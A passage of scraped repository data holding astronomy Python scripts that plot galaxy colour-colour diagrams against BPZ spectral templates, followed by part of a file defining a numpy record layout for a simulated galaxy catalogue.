1\nsbc_r=sbc_r[:100]\nsbc_i=sbc_i[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nplt.plot(-2.5*np.log10(sbc_g/sbc_r),-2.5*np.log10(sbc_r/sbc_i),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_g/el_r),-2.5*np.log10(el_r/el_i),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_g/scd_r),-2.5*np.log10(scd_r/scd_i),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_g/sb3_r),-2.5*np.log10(sb3_r/sb3_i),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_g/sb2_r),-2.5*np.log10(sb2_r/sb2_i),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_g/im_r),-2.5*np.log10(im_r/im_i),color='gray',label='Im')\nplt.xlabel(\"g-r\")\nplt.ylabel(\"r-i\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(r_err**2 + i_err**2)\nerr_y = np.sqrt(i_err**2 + z_err**2)\nplt.clf()\nplt.errorbar(r-i,i-z,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=sbc_r[:100] # in order to constraint redshift between 0 and 1\nsbc_i=sbc_i[:100]\nsbc_z=sbc_z[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nplt.plot(-2.5*np.log10(sbc_r/sbc_i),-2.5*np.log10(sbc_i/sbc_z),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_r/el_i),-2.5*np.log10(el_i/el_z),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_r/scd_i),-2.5*np.log10(scd_i/scd_z),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_r/sb3_i),-2.5*np.log10(sb3_i/sb3_z),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_r/sb2_i),-2.5*np.log10(sb2_i/sb2_z),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_r/im_i),-2.5*np.log10(im_i/im_z),color='gray',label='Im')\nplt.xlabel(\"r-i\")\nplt.ylabel(\"i-z\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(i_err**2 + z_err**2)\nerr_y = np.sqrt(z_err**2 + Y_err**2)\nplt.clf()\nplt.errorbar(i-z,z-Y,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=sbc_i[:100] # in order to constraint redshift between 0 and 1\nsbc_z=sbc_z[:100]\nsbc_Y=sbc_Y[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nel_Y=el_Y[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nscd_Y=scd_Y[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb3_Y=sb3_Y[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nsb2_Y=sb2_Y[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nim_Y=im_Y[:100]\nplt.plot(-2.5*np.log10(sbc_i/sbc_z),-2.5*np.log10(sbc_z/sbc_Y),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_i/el_z),-2.5*np.log10(el_z/el_Y),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_i/scd_z),-2.5*np.log10(scd_z/scd_Y),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_i/sb3_z),-2.5*np.log10(sb3_z/sb3_Y),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_i/sb2_z),-2.5*np.log10(sb2_z/sb2_Y),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_i/im_z),-2.5*np.log10(im_z/im_Y),color='gray',label='Im')\nplt.xlabel(\"i-z\")\nplt.ylabel(\"z-Y\")\nplt.xlim((-1,1))\nplt.ylim((-0.5,1))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\ng,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err=np.loadtxt(\"DESlarge_matchDominique_gals.cat\",usecols=[3,4,5,6,7,8,9,10,11,12],unpack=True)\ng = g + 0.00\nr = r + 0.00\ni = i + 0.00\nz = z + 0.00\nY = Y + 0.00\nerr_x = np.sqrt(g_err**2 + r_err**2)\nerr_y = np.sqrt(r_err**2 + i_err**2)\nplt.clf()\nplt.errorbar(g-r,r-i,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=sbc_g[:100] # in order to constraint redshift between 0 and 1\nsbc_r=sbc_r[:100]\nsbc_i=sbc_i[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nplt.plot(-2.5*np.log10(sbc_g/sbc_r),-2.5*np.log10(sbc_r/sbc_i),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_g/el_r),-2.5*np.log10(el_r/el_i),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_g/scd_r),-2.5*np.log10(scd_r/scd_i),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_g/sb3_r),-2.5*np.log10(sb3_r/sb3_i),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_g/sb2_r),-2.5*np.log10(sb2_r/sb2_i),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_g/im_r),-2.5*np.log10(im_r/im_i),color='gray',label='Im')\nplt.xlabel(\"g-r\")\nplt.ylabel(\"r-i\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\ng,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err=np.loadtxt(\"DESlarge_matchDominique_gals.cat\",usecols=[3,4,5,6,7,8,9,10,11,12],unpack=True)\ng = g + 0.00\nr = r + 0.00\ni = i + 0.00\nz = z + 0.00\nY = Y + 0.00\nerrx_x = np.sqrt(i_err**2 + z_err**2)\nerrx_y = np.sqrt(z_err**2 + Y_err**2)\nplt.clf()\nplt.errorbar(i-z,z-Y,xerr=errx_x,yerr=errx_y,color='black',linestyle=\"None\")\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=sbc_i[:100] # in order to constraint redshift between 0 and 1\nsbc_z=sbc_z[:100]\nsbc_Y=sbc_Y[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nel_Y=el_Y[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nscd_Y=scd_Y[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb3_Y=sb3_Y[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nsb2_Y=sb2_Y[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nim_Y=im_Y[:100]\nplt.plot(-2.5*np.log10(sbc_i/sbc_z),-2.5*np.log10(sbc_z/sbc_Y),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_i/el_z),-2.5*np.log10(el_z/el_Y),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_i/scd_z),-2.5*np.log10(scd_z/scd_Y),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_i/sb3_z),-2.5*np.log10(sb3_z/sb3_Y),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_i/sb2_z),-2.5*np.log10(sb2_z/sb2_Y),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_i/im_z),-2.5*np.log10(im_z/im_Y),color='gray',label='Im')\nplt.xlabel(\"i-z\")\nplt.ylabel(\"z-Y\")\nplt.xlim((-1,1.5))\nplt.ylim((-2.5,2))\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.486184298992157, "alphanum_fraction": 0.5217205286026001, "avg_line_length": 80.63953399658203, "blob_id": "af4d61ea3b50cdb96a90218284631d46b8b98c4e", "content_id": "6f8ec2d7d23e20c2be08a7abfc54765ee27d0cb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14042, "license_type": "no_license", "max_line_length": 292, "num_lines": 172, "path": "/python/scripts/MPA/read.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "import math\nimport numpy as np\n\ngalaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current virial radius for type 0 galaxies, \"infall virial radius\" for type 1,2 galaxies\n ('v_vir' ,'f4' ), #0.0 $ , [km/s] , physical virial velocity of the subhalo the galaxy is/was the center of.\n ('v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the subhalo of which this galaxy is the center, or the last value for satellite galaxies.\n ('gas_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the cold gas disk of galaxy\n ('stellar_spin' ,'f4', 3), #fltarr(3) $ , [Mpc/h km/s] , spin of the stellar disk of galaxy\n ('infall_v_max' ,'f4' ), #0.0 $ , [km/s] , physical maximum rotational velocity of the host halo of this galaxy atinfallSnap.\n ('infall_v_max_peak' ,'f4' ), #0.0 $ , [km/s] , physical maximum past rotational velocity of the host halo of this galaxy.\n ('infall_snap' ,'f4' ), #0L $ , , id of snapshot the galaxy lost type = 0 status\n ('infall_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun/h] , mass in hot gas at the time of infall (same as hotGas for type 0 galaxies).\n ('hot_radius' ,'f4' ), #0.0 $ , [Mpc/h] , radius out to which hot gas extends: rvir for type 0; 0 for type 2; maximum radius out to which hot gas is not stripped for type 1.\n ('ori_merg_time' ,'f4' ), #0.0 $ , [yr] , estimated dyniamical friction time (in years) when the merger clock is set.\n ('merg_time' ,'f4' ), #0.0 $ , [yr] , estimated remaining merging time (in years). oriMergeTime - time since the merger clock is set.\n ('distance_to_central_gal' ,'f4', 3), #fltarr(3) $ , [Mpc/h (?)] , distance between this galaxy and the central galaxy of the fof group\n ('cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , Mass in the cold gas disk.\n ('stellar_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , total mass in stars in the disk and the bulge together.\n ('bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the bulge.\n ('disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of stars in the disk.\n ('hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas.\n ('ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('black_hole_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass of the central black hole\n ('ICM' ,'f4' ), #0.0 $ , (?)\n ('metals_cold_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in cold gas\n ('metals_bulge_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in bulge\n ('metals_disk_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in disk\n ('metals_hot_gas' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in hot gas\n ('metals_ejected_mass' ,'f4' ), #0.0 $ , [10^10 Msun /h] , mass in metals in the ejected mass component\n ('metals_ICM' ,'f4' ), #0.0 $ , (?)\n ('primordial_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Accretion rate of primordial gas.\n ('cooling_rate' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate\n ('cooling_rate_before_AGN' ,'f4' ), #0.0 $ , [Msun/yr] , cooling rate if there was no AGN feedback.\n ('sfr' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate\n ('sfr_bulge' ,'f4' ), #0.0 $ , [Msun/yr] , Star formation rate in bulge.\n ('x_ray_lum' ,'f4' ), #0.0 $ , [log10(erg/sec)] , Log10 of X-Ray luminosity in erg/sec\n ('bulge_size' ,'f4' ), #0.0 $ , [Mpc/h] , Half mass radius of bulge\n ('stellar_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the stellar disk, 3x the scale length.\n ('gas_disk_radius' ,'f4' ), #0.0 $ , [Mpc/h] , Size of the gas disk (?)\n ('cos_inclination' ,'f4' ), #0.0 $ , (?)\n ('disrupt_on' ,'i4' ), #0L $ , , 0: galaxy merged onto merger center; 1: galaxy was disrupted before merging onto its descendant, matter went into ICM of merger center\n ('merge_on' ,'i4' ), #0L $ , , 0: merger clock not set yet;\n ('cooling_radius' ,'f4' ), #0.0 $ , [Mpc/h] , the radius within which the cooling time scale is shorter than the dynamical timescale\n ('quasar_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which cold gas is accreted into the central black hole in the quasar mode.\n ('radio_accretion_rate' ,'f4' ), #0.0 $ , [Msun/yr] , Rate at which hot gas is accreted into the central black hole in the radio mode.\n ('mag' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction not included ?)\n ('mag_bulge' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy bulge (magnification included, dust extinction not included ???)\n ('mag_dust' ,'f4', 40), #fltarr(xx) $ , [mag] , observer-frame apparent (AB) magnitude of galaxy (magnification included, dust extinction included ?)\n ('mass_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('rband_weight_age' ,'f4' ), #0.0 $ , [10^9 yr] , The age of this galaxy, weighted by mass of its components.\n ('sfh_ibin' ,'i4' ), #0L $ , , Index of the higest star formation history bin currently in use.\n ('sfh_numbins' ,'i4' ), #0L $ , , Number of non-empty star formation history bins.\n ('distortion' ,'f4',(2,2)), #fltarr(4) $ , , (11, 12, 21, 22)-components of distortion matrix\n ('plane_number' ,'i4' ) #0L $ , , index of redshift slice (and lens plane) the galaxy is associated with\n ])\n\nfilter_number_for_c_johnson_U = 0\nfilter_number_for_c_johnson_B = 